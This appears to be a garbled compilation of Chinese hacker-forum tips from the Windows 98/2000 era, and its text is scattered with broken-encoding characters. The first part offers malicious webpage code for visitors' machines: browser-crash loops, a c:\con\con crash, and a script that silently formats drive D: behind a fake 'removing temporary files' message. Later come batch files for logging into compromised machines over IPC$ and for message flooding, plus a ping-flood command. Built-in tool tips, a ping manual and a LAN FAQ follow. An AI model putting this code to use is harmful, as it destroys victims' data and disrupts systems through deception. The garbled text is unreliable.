A、死循環(huán)代碼:
『把下列代碼加入到網(wǎng)頁中���,可達(dá)到如上效果』
<img src=javascript:location=“網(wǎng)頁的文件名.htm:”>
說明:當(dāng)含有這段代碼的網(wǎng)頁被人點(diǎn)擊���,連接就會(huì)不斷的打開IE瀏覽器,直到你的系統(tǒng)資源浪費(fèi)到0%~只有重新啟動(dòng)才能正常使用�����!
預(yù)防方法:禁用所有的ActiveX控件和插件!因?yàn)檫@是一個(gè)ActiveX教本程序~
B�、恐怖的大圖片:
『把下列代碼加入到網(wǎng)頁中,可達(dá)到如上效果』
<img src= "http://恐怖圖片的連接地址" width= "1" height= "100000000000000000000000">
說明:當(dāng)打開這樣的網(wǎng)頁���,IE會(huì)不斷的解釋試圖打開����,但由于圖片實(shí)在太大�,超出了其處理能力,所以……
C�、地震死機(jī)代碼:
『把下列代碼加入到網(wǎng)頁中,可達(dá)到如上效果』
<script>
if (window.top.moveBy){
for (i = 1;i < 50; i++){
for (j = 3;j > 0; j--){
window.top.moveBy(0,i);
window.top.moveBy(i,0);
window.top.moveBy(0,-i*2);
window.top.moveBy(-i*2,0);
window.top.moveBy(0,i);
window.top.moveBy(i,0);
}
}
}
</script>
<img src="c:\con\con">
說明:<img src="c:\con\con">是windows9x的設(shè)備名稱解析漏洞���!
WINDOWS9x的\con\con設(shè)備名稱解析漏洞允許用戶進(jìn)行攻擊��,倒是98死機(jī)�。原理:我們知道����,CON是DOS下的特殊設(shè)備名,不允許做文件名���,如果我們?cè)贒OS下鍵入如下命令:copy coldcrysky.txt con�,系統(tǒng)會(huì)顯示coldcrysky.txt的內(nèi)容,如果換成:copy coldcrysky.txt>con系統(tǒng)會(huì)提示文件不能拷貝到文件自身��。如果吧con換成LPT或PRN����,則輸出coldcrysky.txt到打印機(jī)����。由此可見,CON代表文件本身����,如果使用\CON\CON命令,則意味著系統(tǒng)不斷調(diào)用文件本身���,視系統(tǒng)資源迅速枯竭����,連按CTRL+ALT+DEL的機(jī)會(huì)都沒有~
解決辦法:
對(duì)于9X系統(tǒng)���,強(qiáng)烈建議打補(bǔ)?��。����。�。?000和XP則不會(huì)死機(jī)~
D���、格式化硬盤:(最恐怖的~~~慎用?。�。≌?qǐng)勿用于非法用途?�。��?���!使用后如果有任何負(fù)作用,后果自負(fù)��!與傷寒天空『ColdCrySky』�����;亂刀留影無關(guān)!?���。。?br>
scr,Reset();
scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\啟動(dòng)\\startup.htm";
scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>"
WSH.rUN(`start/m format.com d:/q/autotest/u`);
alert(`IMPORTANT : Windows is removing unused temporary files.`);
scr.write();
說明:當(dāng)您瀏覽了網(wǎng)頁���,會(huì)把startup.hta文件寫入啟動(dòng)文件夾��,并提示W(wǎng)INDOWS正在刪除臨時(shí)文件�����!實(shí)際上是在格式化你的D盤,代碼中的:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對(duì)應(yīng)為:Windows Scripting Host Shell Object��。代碼中的:WSH全稱是:Windows Scripting Host����,是微軟的一種基于32位系統(tǒng)平臺(tái)與語言無關(guān)的教本解釋機(jī)制,它使得腳本能在WINDOWS桌面或命令提示符下運(yùn)行~WSH所對(duì)應(yīng)的程序WScript.exe是一個(gè)腳本語言解釋器�����,位于WINDOWS所在文件夾下����,所以它可以像執(zhí)行批處理文件一樣執(zhí)行WSH腳本程序~
解決方法:1)更新您的瀏覽器��,使用最新的瀏覽器上網(wǎng)��!
2)修改msdos.sys����,在其中加入:Bootmentu=0命令行����,目的是禁用啟動(dòng)菜單。
3)吧format.com改名
4)禁用WSH�。具體方法:在win98中,從添加刪除程序中點(diǎn)擊WINDOWS安裝程序�,打開附件一項(xiàng),將WINDOWS SCRIPTING HOST前面的選項(xiàng)去掉��,就可以卸載掉WSH了~~~win2000和xp的用戶可以在我的電腦-工具菜單-文件夾選項(xiàng)-選擇文件類型�����,找到VBS VBSCRIPT FILE選項(xiàng)��,點(diǎn)擊刪除����!
29)系統(tǒng)自帶的系統(tǒng)工具
其實(shí)無論大家從什么地方���,什么方法找到一些好用的工具,都不如Windows自帶的工具用著方便(假設(shè)你區(qū)的地方正好不能上網(wǎng)�����,而你又沒有準(zhǔn)備好這些工具�,那怎么辦?呵呵����,不用著急,用好下面幾個(gè)Windows自帶的小工具����,可以使你事半功倍?����。?br>
1��、msinfo32.exe
位于C:\Program Files\Common Files
Microsoft Shared\Msinfo\msinfo32.exe�����,顯示計(jì)算機(jī)中的有關(guān)系統(tǒng)信息,可用其診斷�����、解決計(jì)算機(jī)問題并查看遠(yuǎn)程系統(tǒng)所生成的系統(tǒng)報(bào)告���。
2�、drwatson.exe --這個(gè)工具給我特別的親密感覺:第一次使用這個(gè)工具是在看了LK007大哥給cool兄弟的回復(fù)以后�,我馬上試驗(yàn)~果然很有意思!LK007不愧是大哥�!現(xiàn)在想起來都佩服不已~~~
位于C: \Windows \drwatson.exe,當(dāng)某個(gè)應(yīng)用程序在運(yùn)行過程中出錯(cuò)時(shí)�,它就會(huì)將出錯(cuò)的程序以及出錯(cuò)的內(nèi)存地址一一記錄下來,并保存為Windows的Drwatson子目錄下的*.wlg記錄文件��。
3�、sfc.exe
位于C:\Windows\System\sfc.exe,用于自動(dòng)搜索被改變��、刪除或損壞了的系統(tǒng)文件��。
4��、msconfig.exe
位于C:\Windows\System\msconfig.exe,通過修改啟動(dòng)方式以及啟動(dòng)時(shí)運(yùn)行哪些應(yīng)用程序等系統(tǒng)配置�����,從而達(dá)到快速排除故障的目的�。
5、scanreg.exe
位于C:\windows\command\scanreg.exe(DOS版本)及C:\windows\scanregw.exe(Windows版本)�����,用于檢查�、修復(fù)、備份以及還原系統(tǒng)注冊(cè)表及相關(guān)配置文件的工具軟件���,防止因注冊(cè)表數(shù)據(jù)被破壞而導(dǎo)致的系統(tǒng)故障��。
6��、vcmui.exe
位于C:\Windows\vcmui.exe,在后臺(tái)自動(dòng)將被覆蓋的驅(qū)動(dòng)程序備份下來��,當(dāng)我們安裝的新驅(qū)動(dòng)出錯(cuò)時(shí)可用它進(jìn)行恢復(fù)�����。
7、winrep.exe
位于C:\Windows\winrep.exe�,能自動(dòng)收集有關(guān)系統(tǒng)信息并提示用戶輸入故障所在,幫我們編寫一篇完整的“求援”報(bào)告��,并將其發(fā)送給有關(guān)技術(shù)維護(hù)人員����,簡(jiǎn)化“求援”操作。
這七個(gè)Windows自帶的小程序可以在開始菜單--運(yùn)行中直接輸入文件名(無需輸入擴(kuò)展名)調(diào)出該程序����!
31)批處理在入侵中的幾則妙用!
A�����、簡(jiǎn)化IPC$登陸肉雞的操作:
用記事本建立一個(gè)名字為:ipcruqin.bat的批處理文件�,內(nèi)容如下:
@net use \\%1\ipc$ %3 /u:"%2"
@echo OK!已經(jīng)成功建立連接
之后��,大家在CMD下輸入:ipcruqin.bat 肉雞IP 肉雞的admin賬號(hào)/用戶的密碼���。就可以登陸上去了�����,而不需要那一大長(zhǎng)串的命令了��!
B�、批處理轟炸對(duì)方電腦:
打開一記事本,在里面輸入如下內(nèi)容:
@echo 正在轟炸中……
tart
@net send %1 %2
@if errorlevel 1 goto over
goto start
ver
@echo 發(fā)送失敗
將其保存為bat格式的文件即可�����,使用方法:*.bat(該批處理文件的名字)+ 空格 + 目標(biāo)IP + 空格 + 你要對(duì)他說得話���!
這次先簡(jiǎn)單介紹這三個(gè)��!等下次有機(jī)會(huì)再給大家介紹更多的批處理文件的用途��!
32)再說幾個(gè)非常簡(jiǎn)單實(shí)用的DOS命令(工具):
A�����、fport.exe --查看那些端口都是那些程序使用的命令��。
B�、netstat -an --查看那些端口于外部的IP連接�。比如這里顯示 :23 XX.XX.XX.XX 而你又沒有開23端口���,那么��,呵呵……還用我說么��?
C�、letmain.exe \\ip -admin -d --列出本機(jī)的administrators組的用戶名查看是否有異常。
D�����、pslist.exe --列出進(jìn)程
E�、pskill.exe --殺掉進(jìn)程,有時(shí)候再任務(wù)管理器中無法終止程序��,那就用這個(gè)工具來停止進(jìn)程��。
F����、login.exe --列出當(dāng)前有那些用戶登陸再你的機(jī)器上。
ping命令詳解
ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list
Options:
-t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C.
不停的ping地方主機(jī)�����,直到你按下Control-C。
此功能沒有什么特別的技巧����,不過可以配合其他參數(shù)使用,將在下面提到�。
-a Resolve addresses to hostnames.
解析計(jì)算機(jī)NetBios名。
示例:C:\>ping -a 192.168.1.21
Pinging iceblood.yofor.com [192.168.1.21] with 32 bytes of data:
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Reply from 192.168.1.21: bytes=32 time<10ms TTL=254
Ping statistics for 192.168.1.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
從上面就可以知道IP為192.168.1.21的計(jì)算機(jī)NetBios名為iceblood.yofor.com�。
-n count Number of echo requests to send.
發(fā)送count指定的Echo數(shù)據(jù)包數(shù)。
在默認(rèn)情況下���,一般都只發(fā)送四個(gè)數(shù)據(jù)包��,通過這個(gè)命令可以自己定義發(fā)送的個(gè)數(shù)���,對(duì)衡量網(wǎng)絡(luò)速度很有幫助,比如我想測(cè)試發(fā)送50個(gè)數(shù)據(jù)包的返回的平均時(shí)間為多少���,最快時(shí)間為多少���,最慢時(shí)間為多少就可以通過以下獲知:
C:\>ping -n 50 202.103.96.68
Pinging 202.103.96.68 with 32 bytes of data:
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Request timed out.
………………
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Reply from 202.103.96.68: bytes=32 time=50ms TTL=241
Ping statistics for 202.103.96.68:
Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 51ms, Average = 46ms
從以上我就可以知道在給202.103.96.68發(fā)送50個(gè)數(shù)據(jù)包的過程當(dāng)中,返回了48個(gè)���,其中有兩個(gè)由于未知原因丟失���,這48個(gè)數(shù)據(jù)包當(dāng)中返回速度最快為40ms�,最慢為51ms�����,平均速度為46ms�。
-l size Send buffer size.
定義echo數(shù)據(jù)包大小�。
在默認(rèn)的情況下windows的ping發(fā)送的數(shù)據(jù)包大小為32byt,我們也可以自己定義它的大小���,但有一個(gè)大小的限制�,就是最大只能發(fā)送65500byt���,也許有人會(huì)問為什么要限制到65500byt�,因?yàn)閃indows系列的系統(tǒng)都有一個(gè)安全漏洞(也許還包括其他系統(tǒng))就是當(dāng)向?qū)Ψ揭淮伟l(fā)送的數(shù)據(jù)包大于或等于65532時(shí)���,對(duì)方就很有可能擋機(jī)���,所以微軟公司為了解決這一安全漏洞于是限制了ping的數(shù)據(jù)包大小。雖然微軟公司已經(jīng)做了此限制�����,但這個(gè)參數(shù)配合其他參數(shù)以后危害依然非常強(qiáng)大,比如我們就可以通過配合-t參數(shù)來實(shí)現(xiàn)一個(gè)帶有攻擊性的命令:(以下介紹帶有危險(xiǎn)性��,僅用于試驗(yàn)�,請(qǐng)勿輕易施于別人機(jī)器上,否則后果自負(fù))
C:\>ping -l 65500 -t 192.168.1.21
Pinging 192.168.1.21 with 65500 bytes of data:
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254
………………
這樣它就會(huì)不停的向192.168.1.21計(jì)算機(jī)發(fā)送大小為65500byt的數(shù)據(jù)包�,如果你只有一臺(tái)計(jì)算機(jī)也許沒有什么效果,但如果有很多計(jì)算機(jī)那么就可以使對(duì)方完全癱瘓�����,我曾經(jīng)就做過這樣的試驗(yàn)�����,當(dāng)我同時(shí)使用10臺(tái)以上計(jì)算機(jī)ping一臺(tái)Win2000Pro系統(tǒng)的計(jì)算機(jī)時(shí)����,不到5分鐘對(duì)方的網(wǎng)絡(luò)就已經(jīng)完全癱瘓,網(wǎng)絡(luò)嚴(yán)重堵塞�����,HTTP和FTP服務(wù)完全停止��,由此可見威力非同小可。
-f Set Don`t Fragment flag in packet.
在數(shù)據(jù)包中發(fā)送“不要分段”標(biāo)志�����。
在一般你所發(fā)送的數(shù)據(jù)包都會(huì)通過路由分段再發(fā)送給對(duì)方�,加上此參數(shù)以后路由就不會(huì)再分段處理。
-i TTL Time To Live.
指定TTL值在對(duì)方的系統(tǒng)里停留的時(shí)間�。
此參數(shù)同樣是幫助你檢查網(wǎng)絡(luò)運(yùn)轉(zhuǎn)情況的�。
-v TOS Type Of Service.
將“服務(wù)類型”字段設(shè)置為 tos 指定的值。
-r count Record route for count hops.
在“記錄路由”字段中記錄傳出和返回?cái)?shù)據(jù)包的路由�。
在一般情況下你發(fā)送的數(shù)據(jù)包是通過一個(gè)個(gè)路由才到達(dá)對(duì)方的,但到底是經(jīng)過了哪些路由呢���?通過此參數(shù)就可以設(shè)定你想探測(cè)經(jīng)過的路由的個(gè)數(shù)���,不過限制在了9個(gè),也就是說你只能跟蹤到9個(gè)路由����,如果想探測(cè)更多,可以通過其他命令實(shí)現(xiàn)�,我將在以后的文章中給大家講解。以下為示例:
C:\>ping -n 1 -r 9 202.96.105.101 (發(fā)送一個(gè)數(shù)據(jù)包���,最多記錄9個(gè)路由)
Pinging 202.96.105.101 with 32 bytes of data:
Reply from 202.96.105.101: bytes=32 time=10ms TTL=249
Route: 202.107.208.187 ->
202.107.210.214 ->
61.153.112.70 ->
61.153.112.89 ->
202.96.105.149 ->
202.96.105.97 ->
202.96.105.101 ->
202.96.105.150 ->
61.153.112.90
Ping statistics for 202.96.105.101:
Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 10ms, Maximum = 10ms, Average = 10ms
從上面我就可以知道從我的計(jì)算機(jī)到202.96.105.101一共通過了202.107.208.187 ���,202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97這幾個(gè)路由���。
-s count Timestamp for count hops.
指定 count 指定的躍點(diǎn)數(shù)的時(shí)間戳。
此參數(shù)和-r差不多���,只是這個(gè)參數(shù)不記錄數(shù)據(jù)包返回所經(jīng)過的路由����,最多也只記錄4個(gè)����。
-j host-list Loose source route along host-list.
利用 computer-list 指定的計(jì)算機(jī)列表路由數(shù)據(jù)包。連續(xù)計(jì)算機(jī)可以被中間網(wǎng)關(guān)分隔(路由稀疏源)IP 允許的最大數(shù)量為 9����。
-k host-list Strict source route along host-list.
利用 computer-list 指定的計(jì)算機(jī)列表路由數(shù)據(jù)包。連續(xù)計(jì)算機(jī)不能被中間網(wǎng)關(guān)分隔(路由嚴(yán)格源)IP 允許的最大數(shù)量為 9����。
-w timeout Timeout in milliseconds to wait for each reply.
指定超時(shí)間隔,單位為毫秒�。
此參數(shù)沒有什么其他技巧��。
ping命令的其他技巧:在一般情況下還可以通過ping對(duì)方讓對(duì)方返回給你的TTL值大小�����,粗略的判斷目標(biāo)主機(jī)的系統(tǒng)類型是Windows系列還是UNIX/Linux系列��,一般情況下Windows系列的系統(tǒng)返回的TTL值在100-130之間�����,而UNIX/Linux系列的系統(tǒng)返回的TTL值在240-255之間,當(dāng)然TTL的值在對(duì)方的主機(jī)里是可以修改的���,Windows系列的系統(tǒng)可以通過修改注冊(cè)表以下鍵值實(shí)現(xiàn):
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"DefaultTTL"=dword:000000ff
255---FF
128---80
64----40
32----20
好了�����,ping命令也基本上完全講解完了�,其中還有-j,-k參數(shù)我還沒有詳細(xì)說明�����,由于某些原因也包括我自己所收集的資料過少這里也沒有向大家詳細(xì)介紹�,請(qǐng)大家見諒���,如果在看了這篇文章的朋友當(dāng)中有知道得比我更多的,以及其他使用技巧的也希望您能告訴我����,并在此先謝過。
局域網(wǎng)應(yīng)用問題專題解答 (Rayi々)
1���、問:我訪問局域網(wǎng)中的計(jì)算機(jī)時(shí)����,為什么常常被提示要輸入用戶名和密碼�����?
答:這主要是為了安全方面的考慮���。而且當(dāng)你重新啟動(dòng)計(jì)算機(jī)時(shí)又要重新輸入用戶名和密碼����,這一點(diǎn)確實(shí)讓人會(huì)覺得很麻煩����。
你只要在需要進(jìn)行文件共享的計(jì)算機(jī)上建立一個(gè)相同的用戶名�,并且使用相同的密碼�,然后局域網(wǎng)中的計(jì)算機(jī)都利用這個(gè)用戶名和密碼登錄,這樣在網(wǎng)上鄰居中訪問對(duì)方計(jì)算機(jī)時(shí)就不需要輸入用戶名和密碼了����。
2、問:上網(wǎng)瀏覽前在局域網(wǎng)中應(yīng)如何對(duì)IE進(jìn)行設(shè)置�?
答:在局域網(wǎng)中使用代理服務(wù)器上網(wǎng)瀏覽時(shí),應(yīng)對(duì)瀏覽器進(jìn)行必要的設(shè)置�。以IE為例,在瀏覽器中代理服務(wù)器的設(shè)置方法為:用鼠標(biāo)右擊桌面上的IE圖標(biāo)��,在彈出的右鍵菜單中選擇“屬性”命令����。在打開的“Internet 屬性”對(duì)話框中選擇“連接”項(xiàng)���,然后點(diǎn)擊“局域網(wǎng)設(shè)置”��,在“局域網(wǎng)(LAN)設(shè)置”對(duì)話框中選中“使用代理服務(wù)器”���,并輸入代理服務(wù)器的地址以及端口。
默認(rèn)對(duì)于HTTP、FTP瀏覽器都是使用相同的代理服務(wù)器設(shè)置����,如果對(duì)這些服務(wù)有不同的代理,你就需要進(jìn)行其他的設(shè)置�。
方法為:點(diǎn)擊“高級(jí)”按鈕,取消“對(duì)所有協(xié)議均使用相同的代理服務(wù)器”����,并分別在不同的服務(wù)中輸入各自的地址和端口,保存以上設(shè)置后����,IE就可以使用代理服務(wù)器上網(wǎng)了。
3�����、問:在局域網(wǎng)中應(yīng)如何設(shè)置OutLook Express收發(fā)郵件�?
答:在局域網(wǎng)中OE等電子郵件收發(fā)軟件同樣可以通過代理服務(wù)器上網(wǎng),只是不能再使用原來的單機(jī)撥號(hào)上網(wǎng)設(shè)置�。而且相對(duì)于其他軟件的代理服務(wù)器設(shè)置,郵件軟件的服務(wù)器設(shè)置要更為特殊一點(diǎn)����,其代理服務(wù)器的類型必須是Socks4或Socks5的服務(wù)器。假設(shè)所使用的代理服務(wù)器的地址為:202.102.49.141,用戶的郵件地址為:jjxm@163.com��。
那么在OE中代理服務(wù)器的設(shè)置方法為:打開OE后�����,選擇菜單“工具→賬戶”�����。在“Internet賬戶”中選擇“郵件”選項(xiàng)卡�����,然后在賬戶列表中選擇需要設(shè)置的賬戶�,點(diǎn)擊“屬性”按鈕。在屬性窗口中選擇“服務(wù)器”選項(xiàng)卡(圖1)�,在接收和發(fā)送郵件服務(wù)器地址中輸入代理服務(wù)器的地址(如202.102.49.141),并按“用戶名#郵件真實(shí)的收信地址”的命名規(guī)則��,在賬戶名中輸入 “jjxm#POP3.163.com”��,單擊“確定”保存后即可在代理服務(wù)器中收發(fā)郵件了���。
4、問:在由三臺(tái)電腦組成的局域網(wǎng)中,我在其中一臺(tái)電腦上用過Windows優(yōu)化大師后�����,為什么這臺(tái)電腦就不能登錄網(wǎng)絡(luò)�,并且還提示找不到撥號(hào)適配器?
答:根據(jù)你說的情況���,是沒有安裝“撥號(hào)網(wǎng)絡(luò)”����。解決方法是:在“控制面板”的“添加/刪除程序”中���,選擇“Windows安裝程序”���,在“組件”的“通訊”中選擇“撥號(hào)網(wǎng)絡(luò)”,然后將Windows安裝盤放入光驅(qū)進(jìn)行安裝�,重新啟動(dòng)計(jì)算機(jī)后就可使用撥號(hào)網(wǎng)絡(luò)了。
5��、問:如何在局域網(wǎng)中設(shè)置QQ��、ICQ等即時(shí)通訊軟件���?
答:在QQ的主窗口中點(diǎn)擊“QQ2000”的按鈕�,在其主菜單中選擇“系統(tǒng)參數(shù)”,在參數(shù)窗口中選擇“網(wǎng)絡(luò)設(shè)置”選項(xiàng)卡��。首先在“上網(wǎng)類型”中選擇“局域網(wǎng)接入Internet”�,再選中“使用Socks5代理服務(wù)器”,然后輸入服務(wù)器的地址以及端口(圖2)��,如果代理服務(wù)器中設(shè)定了用戶密碼��,還需要輸入用戶名和密碼�����。輸入完畢后可以點(diǎn)擊“測(cè)試”按鈕來檢測(cè)其代理是否正常��。最后單擊“確定”即可在代理服務(wù)器中使用QQ了�。
類似地,在ICQ中選擇“連接”中的“防火墻”�����,可以定義多個(gè)代理服務(wù)器�,如Socks4、Socks5�����、HTTPS等��。你首先要確定并選擇所使用的代理服務(wù)器類型�,然后在“代理服務(wù)器”部分輸入主機(jī)的地址、端口�,如果代理服務(wù)器設(shè)置了用戶密碼,還必須輸入用戶名和密碼���。對(duì)于代理服務(wù)器的類型�����、地址�、端口等�,如果你不太清楚,可以詢問網(wǎng)絡(luò)管理員���。
6�、問:我想用NetMeeting進(jìn)行局域網(wǎng)中的通話�����,應(yīng)該如何設(shè)置?
答:如果你首次打開NetMeeting��,軟件會(huì)自動(dòng)啟動(dòng)配置向?qū)?����。在配置向?qū)Т翱邳c(diǎn)擊“下一步”�����,然后輸入你的基本信息(如姓名�����、E-mail等)�。繼續(xù)單擊“下一步”,進(jìn)入服務(wù)器配置窗口�,NetMeeting允許啟動(dòng)時(shí)登錄到目標(biāo)服務(wù)器,這個(gè)功能是針對(duì)于普通上網(wǎng)用戶的���,局域網(wǎng)用戶并不需要該功能�,因此你必須取消該選項(xiàng)��。繼續(xù)單擊“下一步”����,選擇網(wǎng)絡(luò)速度��,必須選擇“局域網(wǎng)”����,然后提示是否建立快捷方式�����,你可以根據(jù)需要進(jìn)行選擇�����。接下來進(jìn)行音頻調(diào)節(jié)測(cè)試后就完成了局域網(wǎng)中對(duì)NetMeeting的設(shè)置�����。
7����、問:我知道在局域網(wǎng)內(nèi)文件是可以共享的��,但我想問的是�,打印機(jī)和掃描儀應(yīng)該如何共享���?
答:先來說說打印機(jī)的共享方法。你可以先在局域網(wǎng)內(nèi)找一臺(tái)電腦����,并把打印機(jī)連接到這臺(tái)電腦上,然后按照說明書為打印機(jī)安裝好驅(qū)動(dòng)程序�。在Windows系統(tǒng)任務(wù)欄上,點(diǎn)擊“開始→設(shè)置→控制面板”�,在“控制面板”窗口中雙擊“打印機(jī)”圖標(biāo),再用鼠標(biāo)右鍵單擊打印機(jī)圖標(biāo)���,在彈出的右鍵菜單上選擇“共享”��,然后在打開的“打印機(jī)屬性”窗口上選擇“共享為”���,并像共享文件那樣給被共享的打印機(jī)也起一個(gè)共享名,然后點(diǎn)擊“確定”即可�。
關(guān)于掃描儀的共享設(shè)置,你首先要看一下你的掃描儀是否具有網(wǎng)絡(luò)共享功能�����,是否配備了用于共享的驅(qū)動(dòng)程序,也就是說只有部分掃描儀可以進(jìn)行網(wǎng)絡(luò)共享����。另外不同型號(hào)掃描儀的共享設(shè)置差異很大,最好查閱一下掃描儀的說明書��。
8���、我用分機(jī)線上網(wǎng)���,上網(wǎng)速度最大才48000bps�����,請(qǐng)問是何原因����? 還有,將Modem放在主機(jī)箱側(cè)面�,開機(jī)后(未打開Modem電源),家里的電話就處于忙音狀態(tài)����,如何解決?
答:第一個(gè)問題跟你的分機(jī)電話線或線接頭質(zhì)量有很大關(guān)系,另外�����,如果你的Modem的速度平常都能接近48000bps���,你也不要太在意�,應(yīng)該重點(diǎn)先看下它的實(shí)際下載速度是否令你滿意�。第二個(gè)問題,肯定和你主機(jī)的電源等配件的電磁輻射強(qiáng)和屏蔽效果差有關(guān)��,你如果不想對(duì)你的主機(jī)進(jìn)行大換血的話���,最好用物體在主機(jī)和Modem之間進(jìn)行屏蔽����,或?qū)odem離你的主機(jī)遠(yuǎn)點(diǎn)�,這是最好的辦法。
9���、我新購(gòu)的網(wǎng)卡在電腦上無法安裝�,而在其他電腦上卻使用正常�����,這是怎么回事?
答:如果在電腦中安裝好網(wǎng)卡后��,系統(tǒng)沒有提示找到新硬件��,你可運(yùn)行“添加新硬件向?qū)А眮碜屜到y(tǒng)搜索新硬件����。方法是單擊“開始”,指向“設(shè)置”���,單擊“控制面板”����,然后再雙擊“添加新硬件”�����。按照屏幕提示操作����。你可選“讓W(xué)indows搜索新硬件嗎����?”��,單擊“是(推薦)”�����,然后再單擊“下一步”���,讓系統(tǒng)找到網(wǎng)卡再安裝其驅(qū)動(dòng)。
而如果出現(xiàn)以下任何現(xiàn)象�����,網(wǎng)卡或者網(wǎng)卡所在的插槽損壞:
1�����、“添加新硬件向?qū)А睓z測(cè)不到網(wǎng)卡���;
2����、“添加新硬件向?qū)А蹦軌驒z測(cè)到網(wǎng)卡����,但無法正常工作�。
為了確定到底是網(wǎng)卡還是插槽的問題����,可以檢查網(wǎng)卡是否牢靠插入插槽之中。如果網(wǎng)卡已牢靠插入插槽之中�,請(qǐng)改插到其他插槽之中試試。如果問題仍未解決����,則可能是網(wǎng)卡損壞或與你的電腦不兼容,可更換之�����。
10�����、我的電腦出現(xiàn)“網(wǎng)上鄰居”中找不到其他聯(lián)網(wǎng)電腦的故障,如何解決����?
答:“網(wǎng)上鄰居”是按工作組顯示計(jì)算機(jī)的�。如果你的電腦沒有設(shè)置工作組名稱���,打開“網(wǎng)上鄰居”時(shí)就可能看不到其他電腦。單擊“開始”�����,指向“設(shè)置”�,單擊“控制面板”,雙擊“網(wǎng)絡(luò)”�,然后再單擊“標(biāo)識(shí)”選項(xiàng)卡�����。你局域網(wǎng)中所有電腦“工作組”框中的名稱應(yīng)為一樣��,如有不同你可在此框中鍵入相同的工作組名稱��,然后單擊“確定”重啟電腦既可����。
此外,如果“網(wǎng)上鄰居”中不出現(xiàn)“整個(gè)網(wǎng)絡(luò)”圖標(biāo)����,可能是在Windows中沒有安裝必要的網(wǎng)絡(luò)組件�����。要與網(wǎng)絡(luò)上的其他計(jì)算機(jī)連接����,則必須安裝以下組件:Microsoft網(wǎng)絡(luò)客戶、網(wǎng)絡(luò)適配器����、至少一種網(wǎng)絡(luò)協(xié)議(如IPX/SPX、TCP/IP等)����。可打開“網(wǎng)絡(luò)”�,檢查“配置”選項(xiàng)卡上的列表,確保已安裝了各種必要的網(wǎng)絡(luò)組件����。如有,你可重新安裝各種缺少的組件即可�。
11、問:公司局域網(wǎng)�����,只有一臺(tái)機(jī)器通過貓接入互聯(lián)網(wǎng)����,現(xiàn)想其他機(jī)器接入互聯(lián)網(wǎng),請(qǐng)問如何實(shí)現(xiàn)�?
答:這是一個(gè)比較典型的代理上網(wǎng)問題。你可以在帶貓的機(jī)器上安裝代理上網(wǎng)軟件(如Sygate���、Wingate����、Winproxy)或直接使用Windows自帶的共享上網(wǎng)功能上網(wǎng)(Windows 98第二版以上才帶此功能)�����。建議使用Sygate����,該軟件設(shè)置較簡(jiǎn)單�����。先撥號(hào)上網(wǎng)�����,后安裝Sygate�����,完畢后�����,Sygate將檢測(cè)互聯(lián)網(wǎng)的連接狀態(tài)�����,并自動(dòng)設(shè)置���。在其他需要代理上網(wǎng)的機(jī)器上,指定網(wǎng)關(guān)和DNS的 IP地址��,步驟為網(wǎng)上鄰居→右鍵→屬性→TCP/IP協(xié)議→屬性→DNS,輸入當(dāng)?shù)豂SP的IP地址→網(wǎng)關(guān)�,輸入代理服務(wù)器的IP地址→確定→重啟�����。設(shè)置完畢后���,其他各項(xiàng)應(yīng)用軟件均無須設(shè)置����。
12�����、問:局域網(wǎng)通過路由器�����、使用ADSL方式上網(wǎng)�����,如何使各工作站快速的獲得可以上網(wǎng)的IP地址而不手工去指定��?
答:假如使用Windows 2000,可以直接使用Windows 2000自帶的dhcp功能���,首先建立一個(gè)作用域�����,然后為這個(gè)作用域添加DNS的搜索順序和路由器的IP地址�����,DNS搜索順序?yàn)楫?dāng)?shù)豂SP的IP地址��,路由器的IP地址即設(shè)置成當(dāng)前局域網(wǎng)的路由器IP地址����,其他機(jī)器則不指定IP地址�,如非使用Windows 2000,則可使用第三方的dhcp軟件�����,比如代理軟件sygate和wingate都帶有dhcp功能���。
13�、問:公司要組建局域網(wǎng),需要用到郵件服務(wù)器和WWW服務(wù)器�,請(qǐng)問這兩種服務(wù)放到一臺(tái)電腦里還是分別用兩臺(tái)電腦?都用什么軟件�����?謝謝����!
答:這兩種服務(wù)現(xiàn)在用的皆比較廣泛���,可以只用一臺(tái)計(jì)算機(jī)或用兩臺(tái)都可以����,當(dāng)然具體根據(jù)貴單位的預(yù)算開支和流量來決定���。假如流量不大的話�,建議只使用一臺(tái)機(jī)器即可���。至于軟件方面�,可以使用Windows 2000作服務(wù)器平臺(tái)�����,然后使用Imail或Easymail作為郵件服務(wù)軟件,www服務(wù)建議使用apache serve軟件��,因?yàn)閃indows 2000自帶的IIS存在許多漏洞��,而且不安裝����,在建立www服務(wù)器后,需考慮支持的語言腳本�,現(xiàn)在用的比較廣的是ASP和PHP,當(dāng)然,具體使用哪種語言���,很簡(jiǎn)單����,看你自己精通哪方面就使用哪方面的����,還有一點(diǎn)你沒提供到的,就是很有必要建立一個(gè)ftp服務(wù)��,你可使用u-ftp軟件����,這款軟件在安裝和使用方面都不難����。
14��、問:家里原先有一臺(tái)PII的計(jì)算機(jī)��,最近又新增一臺(tái)P4機(jī)器���,操作系統(tǒng)都為Windows 98且已安裝網(wǎng)卡,現(xiàn)在我想把他們聯(lián)起來共享資源��,該怎么辦�?
